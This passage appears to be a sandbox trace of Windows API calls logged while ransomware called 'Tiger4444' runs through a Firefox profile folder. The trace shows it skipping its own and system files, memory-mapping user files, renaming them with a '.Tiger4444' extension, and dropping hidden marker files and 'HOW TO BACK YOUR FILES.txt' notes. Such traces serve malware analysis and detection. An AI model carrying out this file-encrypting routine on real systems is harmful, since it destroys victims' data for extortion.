"c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\times.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\times.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\times.json.tiger4444"), dwFlags=0x1) returned 1 [0051.222] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bd1119, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x2bd1119, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb8239875, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Tiger4444.exe") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2=".") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="..") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="windows") returned -1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="bootmgr") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="pagefile.sys") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="boot") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ids.txt") returned 1 [0051.222] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="NTUSER.DAT") returned 1 [0051.222] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="webappsstore.sqlite" | out: lpString1="webappsstore.sqlite") returned="webappsstore.sqlite" [0051.222] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite", dwFileAttributes=0x0) returned 1 [0051.222] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0051.222] lstrlenW (lpString="Tiger4444") returned 9 [0051.222] lstrcmpiW (lpString1="re.sqlite", lpString2="Tiger4444") returned -1 [0051.222] lstrlenW (lpString=".dll") returned 4 [0051.222] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0051.222] lstrlenW (lpString=".lnk") returned 4 [0051.222] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0051.222] lstrlenW (lpString=".ini") returned 4 [0051.222] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0051.222] lstrlenW (lpString=".sys") returned 4 [0051.222] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0051.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\webappsstore.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.223] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.223] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14267577449) returned 1 [0051.223] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=98304) returned 1 [0051.223] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0051.223] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0051.223] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18300, lpName=0x0) returned 0x2c8 [0051.224] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18300) returned 0xbe0000 [0051.234] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.234] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0051.234] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.234] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0051.234] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.234] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0051.234] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.234] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0051.235] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14268763342) returned 1 [0051.235] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0051.235] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0051.235] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.236] CloseHandle (hObject=0x2c8) returned 1 [0051.236] CloseHandle (hObject=0x260) returned 1 [0051.236] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite.Tiger4444") returned 103 [0051.236] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\webappsstore.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0051.236] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8154a58, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8154a58, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xulstore.json", cAlternateFileName="XULSTO~1.JSO")) returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="Tiger4444.exe") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2=".") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="..") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="windows") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="bootmgr") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="pagefile.sys") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="boot") returned 1 [0051.236] lstrcmpiW (lpString1="xulstore.json", lpString2="ids.txt") returned 1 [0051.237] lstrcmpiW (lpString1="xulstore.json", lpString2="NTUSER.DAT") returned 1 [0051.237] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="xulstore.json" | out: lpString1="xulstore.json") returned="xulstore.json" [0051.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json", dwFileAttributes=0x0) returned 1 [0051.237] lstrlenW (lpString="xulstore.json") returned 13 [0051.237] lstrlenW (lpString="Tiger4444") returned 9 [0051.237] lstrcmpiW (lpString1="tore.json", lpString2="Tiger4444") returned 1 [0051.237] lstrlenW (lpString=".dll") returned 4 [0051.237] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.237] lstrlenW (lpString=".lnk") returned 4 [0051.237] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.237] lstrlenW (lpString=".ini") returned 4 [0051.237] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.237] lstrlenW (lpString=".sys") returned 4 [0051.237] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.237] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\xulstore.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.238] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.238] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14269074493) returned 1 [0051.238] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=351) returned 1 [0051.238] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0051.238] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0051.238] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x2c8 [0051.239] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0xbe0000 [0051.240] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc81d40 [0051.240] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0051.240] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.240] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.240] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.241] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.241] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.241] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0051.241] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14269388693) returned 1 [0051.241] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0051.241] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0051.241] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.241] CloseHandle (hObject=0x2c8) returned 1 [0051.241] CloseHandle (hObject=0x260) returned 1 [0051.241] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json.Tiger4444") returned 97 [0051.241] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\xulstore.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\xulstore.json.tiger4444"), dwFlags=0x1) returned 1 [0051.242] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8154a58, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8154a58, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xulstore.json", cAlternateFileName="XULSTO~1.JSO")) returned 0 [0051.242] FindClose (in: hFindFile=0xc73148 | out: hFindFile=0xc73148) returned 1 [0051.242] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.242] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.242] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.242] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.242] CloseHandle (hObject=0x260) returned 1 [0051.242] CloseHandle (hObject=0x2ac) returned 1 [0051.242] GetCurrentThreadId () returned 0xfa8 [0051.242] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86a68 [0051.242] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage" [0051.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc87fa8 | out: hHeap=0xc50000) returned 1 [0051.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86a60 | out: hHeap=0xc50000) returned 1 [0051.243] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage" [0051.243] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\" [0051.243] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3" [0051.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.244] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.246] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.247] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.247] CloseHandle (hObject=0x2ac) returned 1 [0051.247] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage") returned 81 [0051.247] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.247] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c1abf, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x8390b2de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72ec8 [0051.248] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.248] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.248] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.248] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.248] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c1abf, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x8390b2de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.248] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.248] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.248] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.248] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.248] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.248] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8390b2de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8390b2de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8390b2de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.248] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.248] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.248] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41de8bd2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permanent", cAlternateFileName="PERMAN~1")) returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="Tiger4444.exe") returned -1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2=".") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="..") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="windows") returned -1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="bootmgr") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="pagefile.sys") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="boot") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="ids.txt") returned 1 [0051.248] lstrcmpiW (lpString1="permanent", lpString2="NTUSER.DAT") returned 1 [0051.248] lstrcpyW (in: lpString1=0x30aeb4c, lpString2="permanent" | out: lpString1="permanent") returned="permanent" [0051.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc86f20 [0051.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb8) returned 0xc81d40 [0051.248] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc86f28 | out: ListHead=0xc66828, ListEntry=0xc86f28) returned 0xc5a728 [0051.248] FindNextFileW (in: hFindFile=0xc72ec8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41de8bd2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permanent", cAlternateFileName="PERMAN~1")) returned 0 [0051.248] FindClose (in: hFindFile=0xc72ec8 | out: hFindFile=0xc72ec8) returned 1 [0051.248] lstrcpyW (in: lpString1=0x30aeb4c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.248] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.250] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0051.250] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.250] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.250] CloseHandle (hObject=0x260) returned 1 [0051.250] CloseHandle (hObject=0x2ac) returned 1 [0051.250] GetCurrentThreadId () returned 0xfa8 [0051.250] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc86f28 [0051.250] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent" [0051.251] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.251] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc86f20 | out: hHeap=0xc50000) returned 1 [0051.251] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent" [0051.251] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\" [0051.251] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3" [0051.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.252] WriteFile 